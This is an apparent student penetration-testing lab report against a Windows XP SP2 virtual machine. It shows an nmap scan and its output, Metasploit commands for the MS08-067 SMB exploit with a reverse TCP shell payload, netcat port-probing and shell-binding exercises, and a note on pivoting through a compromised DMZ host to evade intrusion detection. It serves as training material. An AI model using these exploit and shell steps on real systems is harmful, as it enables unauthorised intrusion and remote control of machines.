ODIN Securities This Report Was Prepared By: ODINSEC CEO: Phillip Rose phirose@uat.edu The information contained within this report is considered educational and for learning purposes only. Inappropriate and unauthorized disclosure of this report or portions of it could result in significant damage or negative legal issues. This report should be distributed to individuals on a Need-to-Know basis only. Again this document and all cases are hypothetical and for educational and training purposes only. Executive Summary of Security Report Introduction to Report Overview of Report Operating System Identification Kali Linux Current version as of 10/16/2013 Windows XP SP2 Tools Metasploit Framework NetCat Custom Script XP SP2 attack Scanning Thought process for choosing exploit Exploit NETCAT Grab a banner from a TCP service with Netcat and provide a screenshot. Use Netcat to show an open port on a system. Use Netcat to connect to a web server and issue either a HEAD or a GET request Use Netcat to listen verbosely on a port. Vulnerable Image attacks Scanning Thought Process for choosing exploit Exploit XP SP2 attack Scanning nmap -sS -A 192.168.159.141 Starting Nmap 6.01 ( http://nmap.org ) at 2013-11-13 17:49 EST Nmap scan report for 192.168.159.141 Host is up (0.00026s latency). Not shown: 997 closed ports PORT STATE SERVICE 135/tcp open msrpc VERSION Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 00:0C:29:16:8A:C4 (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: AKELLY-D3D808A1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:16:8a:c4 (VMware) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-security-mode: | Account that was used for smb scripts: guest | User-level authentication | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Computer name: akelly-d3d808a1 | NetBIOS computer name: AKELLY-D3D808A1 | Workgroup: WORKGROUP |_ System time: 2013-11-13 17:50:05 UTC-7 Service Enumeration 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Thought process for choosing exploit Since port 445 is open, experience shows that this computer is most likely running SMB over this port. (Default XP configuration) Based on this, I am going to select an exploit relevant to SMB for windows XP. After searching through msf, ms08_067_netapi is chosen as it is a known, reliable exploit for the OS. search smb use exploit/windows/smb/ms08_067_netapi Setting options for the attack show options set RHOST 192.168.159.141 show payloads set PAYLOAD windows/shell/reverse_tcp_allports set LHOST 192.168.159.147 exploit –j NETCAT 1)Grab a banner from a TCP service with Netcat and provide a screenshot. 2)Use Netcat to show an open port on a system. Echo “” |netcat –v –n –w1 192.168.159.141 18-200 With 1 command, I was able to complete both tasks. This would check each port by sending an empty string and putting the output to the screen. Unfortunately, my machine did not have any banners to display. Use Netcat to connect to a web server and issue either a HEAD or a GET request Use Netcat to listen verbosely on a port and have the other send a shell. Bind a shell to a port with Netcat Create a file called transfer.txt that contains the text “Transfer Me”. Now, set Netcat up to listen on a port and send this file when the port is connected to. Connect to the system with the shell bound to the port You are an attacker. Describe a scenario where you would want to / need to use port redirection during an attack. Most likely, I would do this when I am using a beachhead/zombie machine that I took over in the DMZ to perform scans on my behalf. By using this machine that is compromised early in the pen-test, I can get around IDS by having that machine do the scanning for me.